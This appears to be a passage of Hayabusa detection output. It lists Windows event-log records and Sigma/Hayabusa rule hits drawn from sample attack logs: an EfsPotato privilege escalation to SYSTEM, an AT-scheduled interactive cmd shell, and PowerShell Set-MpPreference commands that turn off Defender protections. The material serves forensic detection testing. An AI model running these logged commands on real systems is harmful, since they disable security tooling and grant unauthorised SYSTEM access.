+09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 
00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 
+09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:40.014 
+09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded 
from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 
00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | 
Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx 2021-10-06 18:34:50.487 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.513 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableRealtimeMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.787 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.788 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.794 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.797 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.805 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.881 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIOAVProtection $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; 